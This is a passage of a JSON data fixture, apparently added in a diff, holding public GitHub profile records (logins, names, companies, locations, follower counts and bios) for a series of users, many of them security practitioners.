"public_repositories_count": 5, + "created_at": "2021-04-12T07:03:21Z", + "updated_at": "2024-08-24T12:07:49Z", + "node_id": "MDQ6VXNlcjgyMzY1NTMx", + "bio": "Solution Engineer @ SplxAI", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 497, + "fields": { + "nest_created_at": "2024-09-11T21:23:04.167Z", + "nest_updated_at": "2024-09-11T21:23:04.167Z", + "name": "Sadaf", + "login": "Sadaf-A", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/119438857?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2022-11-29T16:39:02Z", + "updated_at": "2024-08-28T04:57:45Z", + "node_id": "U_kgDOBx5-CQ", + "bio": "GSoC'24 @neutralinojs | Backend Developer | Open Source | CSE'26", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 498, + "fields": { + "nest_created_at": "2024-09-11T21:23:06.987Z", + "nest_updated_at": "2024-09-11T21:23:06.987Z", + "name": "", + "login": "Captain404", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58698256?v=4", + "company": "", + "location": "South Africa", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2019-12-09T15:29:45Z", + "updated_at": "2024-05-19T11:23:10Z", + "node_id": "MDQ6VXNlcjU4Njk4MjU2", + "bio": "Penetration Tester and Cyber Security Enthusiast", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 499, + "fields": { + "nest_created_at": "2024-09-11T21:23:07.805Z", + "nest_updated_at": "2024-09-11T21:23:07.805Z", + "name": "", + "login": "ckgal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23650807?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-11-22T06:45:01Z", + "updated_at": "2024-05-02T07:55:04Z", + "node_id": "MDQ6VXNlcjIzNjUwODA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 500, + "fields": { + "nest_created_at": "2024-09-11T21:23:08.197Z", + "nest_updated_at": "2024-09-11T21:23:08.197Z", + "name": "", + "login": "vikas-chaudhary-2802", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/147247481?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2023-10-07T10:52:12Z", + "updated_at": "2024-03-29T13:55:37Z", + "node_id": "U_kgDOCMbReQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 501, + "fields": { + "nest_created_at": "2024-09-11T21:23:09.579Z", + "nest_updated_at": "2024-09-12T00:32:43.814Z", + "name": "Xavier Godard", + "login": "ZabGo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42573001?v=4", + "company": "xDesign", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2018-08-21T10:23:38Z", + "updated_at": "2024-07-02T12:15:40Z", + "node_id": "MDQ6VXNlcjQyNTczMDAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 502, + "fields": { + "nest_created_at": "2024-09-11T21:23:13.873Z", + "nest_updated_at": "2024-09-22T19:30:00.898Z", + "name": "Jan Seredynski", + "login": "serek8", + "email": "janseredynski@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8598888?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 32, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2014-08-30T13:32:25Z", + "updated_at": "2024-08-29T11:52:18Z", + "node_id": "MDQ6VXNlcjg1OTg4ODg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 503, + "fields": { + "nest_created_at": "2024-09-11T21:23:15.974Z", + "nest_updated_at": "2024-09-11T21:23:15.974Z", + "name": "Tomáš Soukal", + "login": "SirionRazzer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12099284?v=4", + "company": "Talsec", + "location": "Brno", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 21, + "public_gists_count": 5, + "public_repositories_count": 60, + "created_at": "2015-04-24T12:41:00Z", + "updated_at": "2024-09-10T23:39:49Z", + "node_id": "MDQ6VXNlcjEyMDk5Mjg0", + "bio": "Security Consultant @talsec ", + "is_hireable": false, + "twitter_username": "SirionRazzer" + } +}, +{ + "model": "github.user", + "pk": 504, + "fields": { + "nest_created_at": "2024-09-11T21:23:22.150Z", + "nest_updated_at": "2024-09-22T19:30:49.257Z", + "name": "", + "login": "dbasaraba", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17298603?v=4", + "company": "", + "location": "Chicago", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-02-17T16:49:46Z", + "updated_at": "2024-09-13T14:35:59Z", + "node_id": "MDQ6VXNlcjE3Mjk4NjAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 505, + "fields": { + "nest_created_at": "2024-09-11T21:23:31.846Z", + "nest_updated_at": "2024-09-22T19:30:39.981Z", + "name": "Thomas Cannon", + "login": "thomascannon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1297160?v=4", + "company": "", + "location": "England", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 136, + "public_gists_count": 4, + "public_repositories_count": 13, + "created_at": "2012-01-01T05:32:45Z", + "updated_at": "2024-09-11T18:41:54Z", + "node_id": "MDQ6VXNlcjEyOTcxNjA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 506, + "fields": { + "nest_created_at": "2024-09-11T21:23:39.247Z", + "nest_updated_at": "2024-09-22T19:30:08.362Z", + "name": "Prudhv!", + "login": "sk3l10x1ng", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58649792?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2019-12-08T06:10:13Z", + "updated_at": "2024-09-01T11:34:22Z", + "node_id": "MDQ6VXNlcjU4NjQ5Nzky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 507, + "fields": { + "nest_created_at": "2024-09-11T21:23:41.344Z", + "nest_updated_at": "2024-09-22T19:30:59.173Z", + "name": "Oliv'", + "login": "olivandcode", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/119043133?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-11-25T09:35:59Z", + "updated_at": "2024-06-12T08:52:36Z", + "node_id": "U_kgDOBxh0PQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 508, + "fields": { + "nest_created_at": "2024-09-11T21:23:45.562Z", + "nest_updated_at": "2024-09-22T19:31:05.180Z", + "name": "José María Santos", + "login": "jmariasantosdekra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/99655739?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-02-14T11:34:41Z", + "updated_at": "2024-09-03T09:49:29Z", + "node_id": "U_kgDOBfCgOw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 509, + "fields": { + "nest_created_at": "2024-09-11T21:23:52.413Z", + "nest_updated_at": "2024-09-11T21:23:52.413Z", + "name": "Andrey ", + "login": "andreysanyuk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18166102?v=4", + "company": "", + "location": "Poland", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 23, + "public_gists_count": 10, + "public_repositories_count": 15, + "created_at": "2016-03-30T11:27:54Z", + "updated_at": "2024-08-27T16:16:18Z", + "node_id": "MDQ6VXNlcjE4MTY2MTAy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 510, + "fields": { + "nest_created_at": "2024-09-11T21:23:52.857Z", + "nest_updated_at": "2024-09-22T19:31:02.304Z", + "name": "Miłosz Gaczkowski", + "login": "cyberMilosz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104764946?v=4", + "company": "WithSecure", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2022-05-02T10:35:29Z", + "updated_at": "2024-09-13T11:43:24Z", + "node_id": "U_kgDOBj6WEg", + "bio": "", + "is_hireable": false, + "twitter_username": "cyberMilosz" + } +}, +{ + "model": "github.user", + "pk": 511, + "fields": { + "nest_created_at": "2024-09-11T21:23:56.787Z", + "nest_updated_at": "2024-09-22T19:30:31.390Z", + "name": "ScreaM", + "login": "ScreaMy7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/70141504?v=4", + "company": "", + "location": "Kolkata", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 43, + "created_at": "2020-08-24T10:46:23Z", + "updated_at": "2024-09-06T19:17:20Z", + "node_id": "MDQ6VXNlcjcwMTQxNTA0", + "bio": " A computer enthusiast, programmer. Interested in cyber security and bug bounty.", + "is_hireable": false, + "twitter_username": "ScreamZoro" + } +}, +{ + "model": "github.user", + "pk": 512, + "fields": { + "nest_created_at": "2024-09-11T21:26:01.300Z", + "nest_updated_at": "2024-09-11T21:26:01.300Z", + "name": "Egidijus Lileika", + "login": "aegis-dev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9258804?v=4", + "company": "", + "location": "Lithuania", + "collaborators_count": 0, + "following_count": 127, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 15, + "created_at": "2014-10-15T21:58:21Z", + "updated_at": "2024-08-07T10:44:43Z", + "node_id": "MDQ6VXNlcjkyNTg4MDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 513, + "fields": { + "nest_created_at": "2024-09-11T21:26:30.427Z", + "nest_updated_at": "2024-09-22T19:30:30.768Z", + "name": "", + "login": "rsenet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25456431?v=4", + "company": "ORHUS", + "location": "Paris", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2017-01-31T12:33:35Z", + "updated_at": "2023-11-08T13:18:28Z", + "node_id": "MDQ6VXNlcjI1NDU2NDMx", + "bio": "hacking things and humans", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 514, + "fields": { + "nest_created_at": "2024-09-11T21:26:39.339Z", + "nest_updated_at": "2024-09-11T21:26:39.339Z", + "name": "Riccardo Poffo", + "login": "poffo-mobisec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/131383845?v=4", + "company": "@mobisecitalia ", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-04-20T15:20:42Z", + "updated_at": "2024-01-30T15:12:59Z", + "node_id": "U_kgDOB9TCJQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 515, + "fields": { + "nest_created_at": "2024-09-11T21:26:53.468Z", + "nest_updated_at": "2024-09-11T21:27:27.739Z", + "name": "", + "login": "OMTGreleaser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50677565?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-05-15T18:58:38Z", + "updated_at": "2020-06-19T09:25:25Z", + "node_id": "MDQ6VXNlcjUwNjc3NTY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 516, + "fields": { + "nest_created_at": "2024-09-11T21:27:07.954Z", + "nest_updated_at": "2024-09-11T21:27:07.954Z", + "name": "Eric Johnson", + "login": "ejohn20", + "email": "eric.johnson@pumasecurity.io", + "avatar_url": "https://avatars.githubusercontent.com/u/14187430?v=4", + "company": "Puma Security", + "location": "West Des Moines, IA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 53, + "public_gists_count": 6, + "public_repositories_count": 11, + "created_at": "2015-09-08T20:50:30Z", + "updated_at": "2024-08-13T12:59:04Z", + "node_id": "MDQ6VXNlcjE0MTg3NDMw", + "bio": "Principal Security Engineer and co-founder of Puma Security. SANS instructor & author.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 517, + "fields": { + "nest_created_at": "2024-09-11T21:27:09.633Z", + "nest_updated_at": "2024-09-11T21:27:09.633Z", + "name": "", + "login": "MetalBoy78", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71956501?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-09-27T04:17:17Z", + "updated_at": "2022-01-10T21:53:44Z", + "node_id": "MDQ6VXNlcjcxOTU2NTAx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 518, + "fields": { + "nest_created_at": "2024-09-11T21:27:10.431Z", + "nest_updated_at": "2024-09-22T18:24:08.511Z", + "name": "Ryan Thompson", + "login": "sidejackthenativity", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/70146213?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 53, + "created_at": "2020-08-24T12:35:19Z", + "updated_at": "2024-06-27T12:16:21Z", + "node_id": "MDQ6VXNlcjcwMTQ2MjEz", + "bio": "I’m an educator turned pentester but I like all things cyber. Looking for work", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 519, + "fields": { + "nest_created_at": "2024-09-11T21:27:33.590Z", + "nest_updated_at": "2024-09-22T19:31:14.366Z", + "name": "Bernhard Mueller", + "login": "muellerberndt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5194767?v=4", + "company": "@ConsenSys ", + "location": "Chiang Mai, Thailand", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 694, + "public_gists_count": 111, + "public_repositories_count": 115, + "created_at": "2013-08-09T04:02:03Z", + "updated_at": "2024-09-20T06:56:13Z", + "node_id": "MDQ6VXNlcjUxOTQ3Njc=", + "bio": "Uncertified hacker | P(G(F)) = ∀y q(y, G(F))", + "is_hireable": false, + "twitter_username": "muellerberndt" + } +}, +{ + "model": "github.user", + "pk": 520, + "fields": { + "nest_created_at": "2024-09-11T21:27:41.845Z", + "nest_updated_at": "2024-09-22T18:24:49.693Z", + "name": "Pessoft", + "login": "pes-soft", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13953259?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2015-08-24T23:25:28Z", + "updated_at": "2024-09-01T00:52:27Z", + "node_id": "MDQ6VXNlcjEzOTUzMjU5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 521, + "fields": { + "nest_created_at": "2024-09-11T21:27:43.170Z", + "nest_updated_at": "2024-09-11T21:27:48.237Z", + "name": "", + "login": "StPanning", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1735049?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2012-05-13T16:56:58Z", + "updated_at": "2024-04-30T12:46:06Z", + "node_id": "MDQ6VXNlcjE3MzUwNDk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 522, + "fields": { + "nest_created_at": "2024-09-11T21:27:46.099Z", + "nest_updated_at": "2024-09-11T21:27:46.099Z", + "name": "", + "login": "kbrookes", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/137195?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2009-10-09T04:21:47Z", + "updated_at": "2024-09-03T23:14:47Z", + "node_id": "MDQ6VXNlcjEzNzE5NQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 523, + "fields": { + "nest_created_at": "2024-09-11T21:27:49.509Z", + "nest_updated_at": "2024-09-11T21:27:50.348Z", + "name": "", + "login": "pawankumar663", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40355754?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-06-18T10:14:29Z", + "updated_at": "2024-06-04T16:46:53Z", + "node_id": "MDQ6VXNlcjQwMzU1NzU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 524, + "fields": { + "nest_created_at": "2024-09-11T21:27:51.255Z", + "nest_updated_at": "2024-09-22T18:24:47.276Z", + "name": "s1h4d0w", + "login": "s1h4d0w", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5654654?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 10, + "public_repositories_count": 2, + "created_at": "2013-10-10T09:52:11Z", + "updated_at": "2024-08-26T14:28:16Z", + "node_id": "MDQ6VXNlcjU2NTQ2NTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 525, + "fields": { + "nest_created_at": "2024-09-11T21:27:52.069Z", + "nest_updated_at": "2024-09-11T21:27:52.069Z", + "name": "Shabaz Anjum", + "login": "theshahbazanjum", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50936309?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2019-05-23T02:27:17Z", + "updated_at": "2024-08-08T10:15:00Z", + "node_id": "MDQ6VXNlcjUwOTM2MzA5", + "bio": "", + "is_hireable": true, + "twitter_username": "theshahbazanjum" + } +}, +{ + "model": "github.user", + "pk": 526, + "fields": { + "nest_created_at": "2024-09-11T21:27:52.914Z", + "nest_updated_at": "2024-09-22T18:24:50.012Z", + "name": "", + "login": "Yuya-Miyoshi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55824087?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-09-26T04:44:04Z", + "updated_at": "2020-05-29T07:05:12Z", + "node_id": "MDQ6VXNlcjU1ODI0MDg3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 527, + "fields": { + "nest_created_at": "2024-09-11T21:27:53.747Z", + "nest_updated_at": "2024-09-11T21:27:53.747Z", + "name": "", + "login": "stormchaser69", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58668653?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-12-08T20:46:13Z", + "updated_at": "2022-01-26T11:17:39Z", + "node_id": "MDQ6VXNlcjU4NjY4NjUz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 528, + "fields": { + "nest_created_at": "2024-09-11T21:27:54.588Z", + "nest_updated_at": "2024-09-11T21:27:54.588Z", + "name": "Vijay Sarvepalli", + "login": "vijaysar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3278742?v=4", + "company": "http://www.cert.org/", + "location": "USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-01-15T20:09:58Z", + "updated_at": "2023-09-19T17:57:53Z", + "node_id": "MDQ6VXNlcjMyNzg3NDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 529, + "fields": { + "nest_created_at": "2024-09-11T21:27:55.372Z", + "nest_updated_at": "2024-09-11T21:27:55.372Z", + "name": "MX", + "login": "d4op", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11721930?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 52, + "created_at": "2015-03-30T15:00:28Z", + "updated_at": "2024-03-08T12:26:57Z", + "node_id": "MDQ6VXNlcjExNzIxOTMw", + "bio": "nothing is secure:\r\nNASA, US DOD, SDSC\r\nlimitless", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 530, + "fields": { + "nest_created_at": "2024-09-11T21:27:56.257Z", + "nest_updated_at": "2024-09-11T21:27:56.257Z", + "name": "Nelson A. de Oliveira", + "login": "naoliv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/982338?v=4", + "company": "", + "location": "Brasil", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 36, + "public_gists_count": 10, + "public_repositories_count": 35, + "created_at": "2011-08-16T01:11:08Z", + "updated_at": "2024-09-03T11:22:23Z", + "node_id": "MDQ6VXNlcjk4MjMzOA==", + "bio": "ex", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 531, + "fields": { + "nest_created_at": "2024-09-11T21:27:57.061Z", + "nest_updated_at": "2024-09-11T21:27:57.061Z", + "name": "", + "login": "7h30th3r0n3", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75809682?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 89, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2020-12-10T19:55:27Z", + "updated_at": "2024-06-21T09:43:58Z", + "node_id": "MDQ6VXNlcjc1ODA5Njgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 532, + "fields": { + "nest_created_at": "2024-09-11T21:27:57.915Z", + "nest_updated_at": "2024-09-11T21:27:57.915Z", + "name": "", + "login": "bcnx", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7941528?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-06-20T08:40:09Z", + "updated_at": "2022-11-24T00:21:39Z", + "node_id": "MDQ6VXNlcjc5NDE1Mjg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 533, + "fields": { + "nest_created_at": "2024-09-11T21:27:59.162Z", + "nest_updated_at": "2024-09-22T20:27:08.069Z", + "name": "Mohammad Reza Espargham", + "login": "rezasp", + "email": "reza.espargham@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/12808790?v=4", + "company": "@OWASP", + "location": "Cloud", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 194, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2015-06-09T06:00:16Z", + "updated_at": "2023-11-30T15:30:12Z", + "node_id": "MDQ6VXNlcjEyODA4Nzkw", + "bio": "@OWASP Leader", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 534, + "fields": { + "nest_created_at": "2024-09-11T21:28:09.224Z", + "nest_updated_at": "2024-09-11T21:28:09.224Z", + "name": "David", + "login": "securitybits", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25492938?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-02-01T22:14:30Z", + "updated_at": "2021-12-12T21:40:37Z", + "node_id": "MDQ6VXNlcjI1NDkyOTM4", + "bio": "", + "is_hireable": false, + "twitter_username": "securitybits" + } +}, +{ + "model": "github.user", + "pk": 535, + "fields": { + "nest_created_at": "2024-09-11T21:28:11.724Z", + "nest_updated_at": "2024-09-22T20:24:27.686Z", + "name": "Neil Smithline", + "login": "Neil-Smithline", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/766467?v=4", + "company": "Neil Smithline", + "location": "Somewhere in cyberspace", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 39, + "public_gists_count": 9, + "public_repositories_count": 68, + "created_at": "2011-05-03T20:31:00Z", + "updated_at": "2024-09-17T17:55:12Z", + "node_id": "MDQ6VXNlcjc2NjQ2Nw==", + "bio": "Appsec dude. OWASP Top-10 Co-Lead.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 536, + "fields": { + "nest_created_at": "2024-09-11T21:28:15.068Z", + "nest_updated_at": "2024-09-11T21:28:15.068Z", + "name": "", + "login": "gobispo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17577111?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-03-01T19:00:02Z", + "updated_at": "2024-04-04T16:27:14Z", + "node_id": "MDQ6VXNlcjE3NTc3MTEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 537, + "fields": { + "nest_created_at": "2024-09-11T21:28:16.351Z", + "nest_updated_at": "2024-09-11T21:28:16.351Z", + "name": "Gianluca Varisco", + "login": "gvarisco", + "email": "gianluca.varisco@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/945486?v=4", + "company": "@google", + "location": "Paris, France", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 213, + "public_gists_count": 3, + "public_repositories_count": 3, + "created_at": "2011-07-28T22:14:16Z", + "updated_at": "2024-06-27T10:08:06Z", + "node_id": "MDQ6VXNlcjk0NTQ4Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "gvarisco" + } +}, +{ + "model": "github.user", + "pk": 538, + "fields": { + "nest_created_at": "2024-09-11T21:28:17.568Z", + "nest_updated_at": "2024-09-11T21:28:17.568Z", + "name": "ptantiku", + "login": "ptantiku", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/479656?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 29, + "public_gists_count": 55, + "public_repositories_count": 55, + "created_at": "2010-11-13T02:11:48Z", + "updated_at": "2024-09-11T05:16:27Z", + "node_id": "MDQ6VXNlcjQ3OTY1Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 539, + "fields": { + "nest_created_at": "2024-09-11T21:28:18.825Z", + "nest_updated_at": "2024-09-22T17:23:41.462Z", + "name": "Jie Wang", + "login": "wangjie8578", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33919075?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-11-23T03:41:11Z", + "updated_at": "2022-01-25T08:21:49Z", + "node_id": "MDQ6VXNlcjMzOTE5MDc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 540, + "fields": { + "nest_created_at": "2024-09-11T21:28:20.065Z", + "nest_updated_at": "2024-09-22T20:24:43.375Z", + "name": "MT", + "login": "MangatasTondang", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33939482?v=4", + "company": "", + "location": "Canada", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-11-23T18:48:37Z", + "updated_at": "2021-12-01T06:28:54Z", + "node_id": "MDQ6VXNlcjMzOTM5NDgy", + "bio": "InfoSec final year student\r\nSecurity enthusiast\r\nLove learning new stuff!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 541, + "fields": { + "nest_created_at": "2024-09-11T21:28:21.312Z", + "nest_updated_at": "2024-09-22T20:24:47.689Z", + "name": "", + "login": "securityplus2004", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30834912?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-08-08T13:35:55Z", + "updated_at": "2021-01-26T14:40:54Z", + "node_id": "MDQ6VXNlcjMwODM0OTEy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 542, + "fields": { + "nest_created_at": "2024-09-11T21:28:22.548Z", + "nest_updated_at": "2024-09-11T21:28:22.548Z", + "name": "xl-sec", + "login": 